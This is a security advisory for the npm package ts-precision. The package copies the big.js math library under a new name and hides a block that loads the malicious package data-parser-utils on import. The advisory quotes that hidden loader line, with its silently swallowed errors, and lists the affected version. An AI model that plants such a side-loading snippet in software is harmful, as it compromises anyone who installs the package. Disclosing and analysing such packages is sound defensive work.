VYPR

npm · Malicious package advisory

Malware

ts-precision

MAL-2026-6469

Malicious code in ts-precision (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (e7d2534408d7dd1d7f02c3ef470bc697d0803e8acd58941de5974a250127cb8c)
Package ships a verbatim copy of big.js v7.0.1 (including the original author metadata 'Michael Mclaughlin <M8ch88l@gmail.com>' and repo reference MikeMcl/big.js) under a different name, mimicking a legitimate arbitrary-precision math library to lure installers. Hidden between math methods in the module body is an unrelated block: `try { const doc = require("data-parser-utils"); doc.from_str().then(e => { }).catch(e => { }) } catch (error) { }`. This block fires on every `require('ts-precision')` / `import` of the package, pulling in and invoking the known-malicious npm package `data-parser-utils`, with errors silently swallowed in an empty try/catch and no-op promise handlers to hide failures from the consumer. The dependency invocation is unrelated to decimal arithmetic and exists solely to side-load attacker-controlled code into any consumer's process at module load.

Compromised versions (1)

  • 3.7.2

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.